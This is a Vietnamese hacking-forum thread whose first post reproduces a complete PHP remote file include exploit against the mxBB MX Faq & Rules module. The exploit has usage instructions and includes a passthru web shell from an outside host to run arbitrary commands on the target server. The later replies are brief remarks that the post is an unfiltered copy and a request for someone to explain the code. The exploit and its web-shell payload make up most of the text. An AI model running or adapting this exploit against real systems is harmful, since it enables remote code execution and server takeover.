banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm  XML
  [Question]   Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm 05/05/2007 06:52:40 (+0700) | #1 | 57199
[Avatar]
vippro123
Locked

[Minus]    0    [Plus]
Joined: 22/03/2007 18:15:50
Messages: 111
Location: HuẾ MộNg mơ
Offline
[Profile] [PM]
#!/usr/bin/php -q -d short_open_tag=on
<?
print '

mxBB Module MX Faq & Rules <= 2.0.0 (faq.php) Remote File Include Exploit

[Vendor: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=371



Bug found and Exploit by bd0rk from SOH-Crew


Website1: www.hackschool.dl.am
Website2: www.soh-crew.it.tt

Contact: bd0rk@hackermail.com


Coded by bd0rk
';

if ($argc<4) {
print ('
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php '.$argv[0].' host shell cmd OPTIONS
host: script server (ip/hostname)
shell: path to shell (<?passthru($_GET[cmd]);?>smilie
cmd: a shell command (ls -la)
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"bd0rk from Germany search exploits just for fun";ini_set("max_execution_time",0);echo "hauru";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$shell=$argv[2];
$cmd="";

$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p='http://'.$host.':'.$port;}

$packet ="GET ".$p."faq.php?module_root_path=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"hauru"))
{
$temp=explode("hauru",$html);
die($temp[1]);
}
echo "Error";
?>

# vnsecurity.com [2007-05-02]
[Up] [Print Copy]
  [Question]   Re: Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm 15/05/2007 04:21:04 (+0700) | #2 | 59160
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Hừm... lấy từ milw0rm mà sao lại để # vnsecurity.com [2007-05-02] là sao?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm 15/05/2007 07:29:41 (+0700) | #3 | 59195
[Avatar]
phonglanbiec
Member

[Minus]    0    [Plus]
Joined: 03/07/2006 20:56:00
Messages: 162
Offline
[Profile] [PM]
Cái code tự động cập nhật những bài viết từ MilW0rm của VNSecurity.com, chắc khi copy vippro123 copy hết, không sàng lọc.
[Up] [Print Copy]
  [Question]   Re: Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm 25/06/2007 08:34:42 (+0700) | #4 | 66761
[Avatar]
vippro123
Locked

[Minus]    0    [Plus]
Joined: 22/03/2007 18:15:50
Messages: 111
Location: HuẾ MộNg mơ
Offline
[Profile] [PM]
có bác nào hiểu đoạn code nói gì ko,giải thích giùm em cái
[Up] [Print Copy]
  [Question]   Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm 25/06/2007 12:37:19 (+0700) | #5 | 66829
[Avatar]
K4i
Moderator

Joined: 18/04/2006 09:32:13
Messages: 635
Location: Underground
Offline
[Profile] [PM]
Ack! Code PHP mà, chịu khó đọc kĩ đi. (Lúc đầu nhìn lướt cứ tưởng perl :mrgreensmilie
Sống là để không chết chứ không phải để trở thành anh hùng
[Up] [Print Copy]
  [Question]   Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm 26/06/2007 12:19:16 (+0700) | #6 | 67061
[Avatar]
hakuso
HVA Friend

Joined: 04/01/2004 13:28:06
Messages: 287
Location: làng Đo Đo
Offline
[Profile] [PM]
Code:
#!/usr/bin/php -q -d short_open_tag=on


Nhìn vào cái này thì chú nào muốn chạy thử chắc phải học chút ít Linux, ít ra là LiveCD :p
Live, fight, work and study
[Up] [Print Copy]
  [Question]   Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm 30/06/2007 05:32:53 (+0700) | #7 | 67820
[Avatar]
phstiger
Member

[Minus]    0    [Plus]
Joined: 23/01/2007 17:47:26
Messages: 261
Offline
[Profile] [PM]
Theo mình nghĩ nội dung topic này rất thừa. Đặt tiêu đề và nội dung copy từ 1 site khác đặt vào, và chẳng có hướng dẫn hay thảo luận hỏi hang jì cả...
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|